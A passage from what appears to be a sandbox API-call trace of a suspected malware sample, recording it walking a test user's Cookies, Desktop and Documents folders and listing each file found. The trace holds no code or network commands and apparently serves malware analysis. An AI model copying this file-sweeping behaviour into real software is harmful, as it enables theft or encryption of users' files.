lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.734] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.734] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Cookies\\") returned="Cookies\\" [0180.734] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.734] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0180.734] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.734] PathFindFileNameW (pszPath="") returned="" [0180.734] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Cookies\\*" (normalized: "c:\\users\\keecfmwgj\\cookies\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0180.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.734] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.734] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0180.734] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.734] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0180.735] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.735] PathFindFileNameW (pszPath="") returned="" [0180.735] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x981b85c0, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0x981b85c0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x981b85c0, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0x981b85c0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77dd7e80, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0x78761500, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0x76528d00, ftLastWriteTime.dwHighDateTime=0x1d8a8b8, nFileSizeHigh=0x0, nFileSizeLow=0xb8800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", cAlternateFileName="0336CC~1.EXE")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x620ef60, ftCreationTime.dwHighDateTime=0x1d89f88, ftLastAccessTime.dwLowDateTime=0x38c8f110, ftLastAccessTime.dwHighDateTime=0x1d8a1c2, ftLastWriteTime.dwLowDateTime=0x38c8f110, ftLastWriteTime.dwHighDateTime=0x1d8a1c2, nFileSizeHigh=0x0, nFileSizeLow=0xe510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0W8tqjZS69QqxVZS-D8D.ods", cAlternateFileName="0W8TQJ~1.ODS")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff454b20, ftCreationTime.dwHighDateTime=0x1d89e3b, ftLastAccessTime.dwLowDateTime=0xc237f070, ftLastAccessTime.dwHighDateTime=0x1d89e5e, ftLastWriteTime.dwLowDateTime=0xc237f070, ftLastWriteTime.dwHighDateTime=0x1d89e5e, nFileSizeHigh=0x0, nFileSizeLow=0x2543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2CgRhD9i_8EFMrM.png", cAlternateFileName="2CGRHD~1.PNG")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65db15b0, ftCreationTime.dwHighDateTime=0x1d89980, ftLastAccessTime.dwLowDateTime=0x38eff3c0, ftLastAccessTime.dwHighDateTime=0x1d899f0, ftLastWriteTime.dwLowDateTime=0x38eff3c0, ftLastWriteTime.dwHighDateTime=0x1d899f0, nFileSizeHigh=0x0, nFileSizeLow=0x1fbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3YV6ib1oIpsefRwtFe.pdf", cAlternateFileName="3YV6IB~1.PDF")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf10c2d0, ftCreationTime.dwHighDateTime=0x1d89e64, ftLastAccessTime.dwLowDateTime=0x569718d0, ftLastAccessTime.dwHighDateTime=0x1d8a153, ftLastWriteTime.dwLowDateTime=0x569718d0, ftLastWriteTime.dwHighDateTime=0x1d8a153, nFileSizeHigh=0x0, nFileSizeLow=0x18c23, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5EtXO0qde4mAaAj2.mp3", cAlternateFileName="5ETXO0~1.MP3")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d25400, ftCreationTime.dwHighDateTime=0x1d89b69, ftLastAccessTime.dwLowDateTime=0xb8c29390, ftLastAccessTime.dwHighDateTime=0x1d8a0f9, ftLastWriteTime.dwLowDateTime=0xb8c29390, ftLastWriteTime.dwHighDateTime=0x1d8a0f9, nFileSizeHigh=0x0, nFileSizeLow=0xd6c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Ouhy.mp3", cAlternateFileName="")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5009dff0, ftCreationTime.dwHighDateTime=0x1d8a46b, ftLastAccessTime.dwLowDateTime=0xe2c461e0, ftLastAccessTime.dwHighDateTime=0x1d8a613, ftLastWriteTime.dwLowDateTime=0xe2c461e0, ftLastWriteTime.dwHighDateTime=0x1d8a613, nFileSizeHigh=0x0, nFileSizeLow=0x4171, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A85pj5GgBuiXXfuVCW4.ppt", cAlternateFileName="A85PJ5~1.PPT")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1d93b80, ftCreationTime.dwHighDateTime=0x1d89a4e, ftLastAccessTime.dwLowDateTime=0x36bce340, ftLastAccessTime.dwHighDateTime=0x1d89fe7, ftLastWriteTime.dwLowDateTime=0x36bce340, ftLastWriteTime.dwHighDateTime=0x1d89fe7, nFileSizeHigh=0x0, nFileSizeLow=0x2c3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bkw1.mp4", cAlternateFileName="")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34401c80, ftCreationTime.dwHighDateTime=0x1d89f70, ftLastAccessTime.dwLowDateTime=0x8a15bdc0, ftLastAccessTime.dwHighDateTime=0x1d8a2c4, ftLastWriteTime.dwLowDateTime=0x8a15bdc0, ftLastWriteTime.dwHighDateTime=0x1d8a2c4, nFileSizeHigh=0x0, nFileSizeLow=0x13f78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="djRHD.jpg", cAlternateFileName="")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaecd420, ftCreationTime.dwHighDateTime=0x1d89986, ftLastAccessTime.dwLowDateTime=0xf21589a0, ftLastAccessTime.dwHighDateTime=0x1d89efa, ftLastWriteTime.dwLowDateTime=0xf21589a0, ftLastWriteTime.dwHighDateTime=0x1d89efa, nFileSizeHigh=0x0, nFileSizeLow=0x1a22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E 8rOnJ1a8nkX -7zzxk.wav", cAlternateFileName="E8RONJ~1.WAV")) returned 1 [0180.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fe2f250, ftCreationTime.dwHighDateTime=0x1d8977f, ftLastAccessTime.dwLowDateTime=0xd8a72fe0, ftLastAccessTime.dwHighDateTime=0x1d89992, ftLastWriteTime.dwLowDateTime=0xd8a72fe0, ftLastWriteTime.dwHighDateTime=0x1d89992, nFileSizeHigh=0x0, nFileSizeLow=0x107d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eSfxo-E.jpg", cAlternateFileName="")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6527610, ftCreationTime.dwHighDateTime=0x1d8a03e, ftLastAccessTime.dwLowDateTime=0x9a120ac0, ftLastAccessTime.dwHighDateTime=0x1d8a6fd, ftLastWriteTime.dwLowDateTime=0x9a120ac0, ftLastWriteTime.dwHighDateTime=0x1d8a6fd, nFileSizeHigh=0x0, nFileSizeLow=0x300f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i_u5ln.wav", cAlternateFileName="")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e0b920, ftCreationTime.dwHighDateTime=0x1d89fd9, ftLastAccessTime.dwLowDateTime=0x184a2940, ftLastAccessTime.dwHighDateTime=0x1d8a226, ftLastWriteTime.dwLowDateTime=0x184a2940, ftLastWriteTime.dwHighDateTime=0x1d8a226, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkGJiQ3H.wav", cAlternateFileName="")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x819a0f70, ftCreationTime.dwHighDateTime=0x1d8a107, ftLastAccessTime.dwLowDateTime=0x5bc04980, ftLastAccessTime.dwHighDateTime=0x1d8a34c, ftLastWriteTime.dwLowDateTime=0x5bc04980, ftLastWriteTime.dwHighDateTime=0x1d8a34c, nFileSizeHigh=0x0, nFileSizeLow=0x1360e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nFEQU_fXuy ewF.mkv", cAlternateFileName="NFEQU_~1.MKV")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa97270d0, ftCreationTime.dwHighDateTime=0x1d89a6a, ftLastAccessTime.dwLowDateTime=0xccaa7f30, ftLastAccessTime.dwHighDateTime=0x1d89b59, ftLastWriteTime.dwLowDateTime=0xccaa7f30, ftLastWriteTime.dwHighDateTime=0x1d89b59, nFileSizeHigh=0x0, nFileSizeLow=0x6d2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rwzd9mw.mp4", cAlternateFileName="")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f708690, ftCreationTime.dwHighDateTime=0x1d8a48d, ftLastAccessTime.dwLowDateTime=0x5e31fa40, ftLastAccessTime.dwHighDateTime=0x1d8a614, ftLastWriteTime.dwLowDateTime=0x5e31fa40, ftLastWriteTime.dwHighDateTime=0x1d8a614, nFileSizeHigh=0x0, nFileSizeLow=0x1357e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U00H4oegdjWIv9LIU5.png", cAlternateFileName="U00H4O~1.PNG")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ce9b70, ftCreationTime.dwHighDateTime=0x1d89be0, ftLastAccessTime.dwLowDateTime=0xd142db10, ftLastAccessTime.dwHighDateTime=0x1d8a3b4, ftLastWriteTime.dwLowDateTime=0xd142db10, ftLastWriteTime.dwHighDateTime=0x1d8a3b4, nFileSizeHigh=0x0, nFileSizeLow=0xe260, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UIMsFJjz.rtf", cAlternateFileName="")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74bdd80, ftCreationTime.dwHighDateTime=0x1d89dbc, ftLastAccessTime.dwLowDateTime=0x10fe9850, ftLastAccessTime.dwHighDateTime=0x1d89dbd, ftLastWriteTime.dwLowDateTime=0x10fe9850, ftLastWriteTime.dwHighDateTime=0x1d89dbd, nFileSizeHigh=0x0, nFileSizeLow=0xa5dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usU4fi-1.ots", cAlternateFileName="")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd31bac60, ftCreationTime.dwHighDateTime=0x1d8a3f9, ftLastAccessTime.dwLowDateTime=0xb8d91740, ftLastAccessTime.dwHighDateTime=0x1d8a627, ftLastWriteTime.dwLowDateTime=0xb8d91740, ftLastWriteTime.dwHighDateTime=0x1d8a627, nFileSizeHigh=0x0, nFileSizeLow=0x11ed8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvnwCx.jpg", cAlternateFileName="")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834cce50, ftCreationTime.dwHighDateTime=0x1d89e2f, ftLastAccessTime.dwLowDateTime=0xf0a97c20, ftLastAccessTime.dwHighDateTime=0x1d8a0df, ftLastWriteTime.dwLowDateTime=0xf0a97c20, ftLastWriteTime.dwHighDateTime=0x1d8a0df, nFileSizeHigh=0x0, nFileSizeLow=0x10ac9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xnJF1rqEtdtxtC.mkv", cAlternateFileName="XNJF1R~1.MKV")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe240cd00, ftCreationTime.dwHighDateTime=0x1d89f4f, ftLastAccessTime.dwLowDateTime=0x90791d0, ftLastAccessTime.dwHighDateTime=0x1d8a3ec, ftLastWriteTime.dwLowDateTime=0x90791d0, ftLastWriteTime.dwHighDateTime=0x1d8a3ec, nFileSizeHigh=0x0, nFileSizeLow=0xd9a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YA9u.mp3", cAlternateFileName="")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4bcfb30, ftCreationTime.dwHighDateTime=0x1d8995c, ftLastAccessTime.dwLowDateTime=0xece51490, ftLastAccessTime.dwHighDateTime=0x1d8a365, ftLastWriteTime.dwLowDateTime=0xece51490, ftLastWriteTime.dwHighDateTime=0x1d8a365, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YnPBSI277", cAlternateFileName="YNPBSI~1")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55093470, ftCreationTime.dwHighDateTime=0x1d89911, ftLastAccessTime.dwLowDateTime=0x17b3c5e0, ftLastAccessTime.dwHighDateTime=0x1d8a0d7, ftLastWriteTime.dwLowDateTime=0x17b3c5e0, ftLastWriteTime.dwHighDateTime=0x1d8a0d7, nFileSizeHigh=0x0, nFileSizeLow=0x16045, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z8twGmunEhQoxqFe1k.mp3", cAlternateFileName="Z8TWGM~1.MP3")) returned 1 [0180.736] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55093470, ftCreationTime.dwHighDateTime=0x1d89911, ftLastAccessTime.dwLowDateTime=0x17b3c5e0, ftLastAccessTime.dwHighDateTime=0x1d8a0d7, ftLastWriteTime.dwLowDateTime=0x17b3c5e0, ftLastWriteTime.dwHighDateTime=0x1d8a0d7, nFileSizeHigh=0x0, nFileSizeLow=0x16045, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z8twGmunEhQoxqFe1k.mp3", cAlternateFileName="Z8TWGM~1.MP3")) returned 0 [0180.736] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.736] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.736] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0180.736] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.737] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0180.737] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.737] PathFindFileNameW (pszPath="") returned="" [0180.737] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b0246b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b0246b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.737] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b0246b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b0246b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.738] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe83efde0, ftCreationTime.dwHighDateTime=0x1d89d4b, ftLastAccessTime.dwLowDateTime=0x44c033a0, ftLastAccessTime.dwHighDateTime=0x1d8a2a5, ftLastWriteTime.dwLowDateTime=0x44c033a0, ftLastWriteTime.dwHighDateTime=0x1d8a2a5, nFileSizeHigh=0x0, nFileSizeLow=0x51e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3_n MMYV5XKxtc1mbc-U.pdf", cAlternateFileName="3_NMMY~1.PDF")) returned 1 [0180.738] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a50ba20, ftCreationTime.dwHighDateTime=0x1d83356, ftLastAccessTime.dwLowDateTime=0xa39c8a60, ftLastAccessTime.dwHighDateTime=0x1d88723, ftLastWriteTime.dwLowDateTime=0xa39c8a60, ftLastWriteTime.dwHighDateTime=0x1d88723, nFileSizeHigh=0x0, nFileSizeLow=0x8145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5usDb JNuS3uVdkW.xlsx", cAlternateFileName="5USDBJ~1.XLS")) returned 1 [0180.738] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802f9170, ftCreationTime.dwHighDateTime=0x1d89cbe, ftLastAccessTime.dwLowDateTime=0x4c8902e0, ftLastAccessTime.dwHighDateTime=0x1d8a4f5, ftLastWriteTime.dwLowDateTime=0x4c8902e0, ftLastWriteTime.dwHighDateTime=0x1d8a4f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8NNLi0kOEoM-mpUM785", cAlternateFileName="8NNLI0~1")) returned 1 [0180.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0180.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0180.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0180.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40370 [0180.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0180.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0180.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0180.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a403c8 | out: hHeap=0x2c0000) returned 1 [0180.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a404d0 | out: hHeap=0x2c0000) returned 1 [0180.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0180.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0180.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0180.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0180.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0180.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x443caa50, ftCreationTime.dwHighDateTime=0x1d843f3, ftLastAccessTime.dwLowDateTime=0x7cb907c0, ftLastAccessTime.dwHighDateTime=0x1d877b0, ftLastWriteTime.dwLowDateTime=0x7cb907c0, ftLastWriteTime.dwHighDateTime=0x1d877b0, nFileSizeHigh=0x0, nFileSizeLow=0xc02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="92-ieu- ecANbCAHxu3.pptx", cAlternateFileName="92-IEU~1.PPT")) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39e8cd0, ftCreationTime.dwHighDateTime=0x1d8894b, ftLastAccessTime.dwLowDateTime=0xb678cb30, ftLastAccessTime.dwHighDateTime=0x1d88b6f, ftLastWriteTime.dwLowDateTime=0xb678cb30, ftLastWriteTime.dwHighDateTime=0x1d88b6f, nFileSizeHigh=0x0, nFileSizeLow=0xc775, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a_eeMub.docx", cAlternateFileName="A_EEMU~1.DOC")) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7519b550, ftCreationTime.dwHighDateTime=0x1d88dd1, ftLastAccessTime.dwLowDateTime=0x7104f2e0, ftLastAccessTime.dwHighDateTime=0x1d89b23, ftLastWriteTime.dwLowDateTime=0x7104f2e0, ftLastWriteTime.dwHighDateTime=0x1d89b23, nFileSizeHigh=0x0, nFileSizeLow=0xf055, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bDmsvG.docx", cAlternateFileName="BDMSVG~1.DOC")) returned 